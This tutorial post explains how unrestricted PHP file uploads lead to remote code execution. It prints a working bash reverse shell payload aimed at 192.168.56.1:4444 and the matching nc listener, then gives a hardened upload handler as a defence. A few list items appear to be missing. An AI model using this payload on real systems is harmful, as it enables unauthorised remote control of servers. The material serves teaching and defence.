Tags: PHP, ethical-hacking, reverse-shell, arbitrary upload, remote execution, web exploitation
Exploring PHP vulnerabilities and how they turn into remote access. This exercise introduces one of the most basic, and most powerful, techniques in the hacking world: the reverse shell. A simple vulnerable form, a malicious file uploaded without restrictions, and suddenly the server is talking to you.
PHP (Hypertext Preprocessor) is an interpreted server-side programming language. Originally designed for web development, and despite criticism, it still powers much of the internet infrastructure.
It executes instructions directly on the server, which means that any .php file that gets uploaded and then executed runs with the web server's privileges: it can reach the file system, run system commands, and more, if not properly controlled.
PHP has been a source of vulnerabilities for years, mainly due to bad practices in:
- File inclusion (include, require) without path validation.
- Command and code execution functions (exec(), system(), eval()).
- Unsanitized user input ($_GET, $_POST, etc.).
One of the most common, and deadliest, is arbitrary file upload.
It means that an application allows you to upload any type of file, without checking extensions, content, permissions, or location.
In PHP environments, this can allow an attacker to upload a malicious .php file. When that file is requested from the browser, the server executes it as code. As a result, the attacker can execute commands, download tools, or establish a reverse shell.
A reverse shell is an outgoing connection from the victim machine to the attacker's machine. Instead of the attacker connecting directly to the server (which may be blocked by firewalls), the compromised machine connects out, opening a remote shell.
Once established, the attacker has an interactive shell on the compromised host, all over a simple text connection.
A basic payload in PHP might look like this:
```php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.1/4444 0>&1'");
?>
```
This tells the server: open a TCP connection to 192.168.56.1 on port 4444, and redirect bash's input and output to that socket. Meanwhile, on the attacker's machine, you wait for the connection with:
```
nc -lvnp 4444
```
When the victim opens the PHP file through the browser, the code executes and the reverse shell is activated.
The absence of validation in upload forms can:
Best practices:
- Keep uploaded files away from the application code (/uploads/ should be separated from the PHP backend).

A reverse shell is the system's whisper, telling you: "You're no longer outside." A simple, poorly protected upload function is enough to turn a server into an open door, and you, as an attacker, just need to know where to look.
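To make the upload side of this concrete, here is an added example (not code from the original post) of the kind of upload handler that turns a .php upload into code execution, shown as a comment, next to a hardened handler that applies the best practices above. It assumes a web root of /var/www/html, an upload directory /var/www/uploads outside it, and a form field named "file"; only a few image types are accepted.

```php
<?php
// Added example (not from the original post): a hardened upload handler
// following the best practices above. Assumptions: the web root is
// /var/www/html, uploads are stored in /var/www/uploads (outside it), and
// the form field is named "file". Only a few image types are accepted.

const UPLOAD_DIR = '/var/www/uploads';   // not served by the web server
const MAX_BYTES  = 2 * 1024 * 1024;      // 2 MiB
// Allowlist: stored extension => MIME type expected from the file content
const ALLOWED = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'gif' => 'image/gif'];

// Returns the stored file name on success, or an "error: ..." string.
function handle_upload(array $file): string
{
    // The vulnerable pattern, for contrast:
    //   move_uploaded_file($file['tmp_name'], '/var/www/html/uploads/' . $file['name']);
    // shell.php lands under the web root and runs as soon as it is requested.

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        return 'error: upload failed';
    }
    if ($file['size'] > MAX_BYTES) {
        return 'error: file too large';
    }
    // 1. Determine the type from the file's bytes, not from the client's
    //    file name or Content-Type header (both are attacker-controlled).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = array_search($mime, ALLOWED, true);
    if ($ext === false) {
        return 'error: file type not allowed';
    }
    // 2. Never reuse the client-supplied name: random name, allowlisted
    //    extension, no path components (blocks shell.php.png and ../ tricks).
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    // 3. Store outside the web root so the PHP interpreter never sees it;
    //    0640 also drops the execute bit.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return 'error: could not store file';
    }
    chmod($dest, 0640);
    return $name;
}

if (isset($_FILES['file'])) {
    echo htmlspecialchars(handle_upload($_FILES['file']), ENT_QUOTES, 'UTF-8');
}
```

Serve the stored files back through a download script (readfile() with a fixed Content-Type and Content-Disposition: attachment) or from a separate static host, never by exposing the directory to the interpreter. If some upload directory must remain under the web root, also switch PHP off for it at the web server (for Apache with mod_php, php_admin_flag engine off in that directory's configuration).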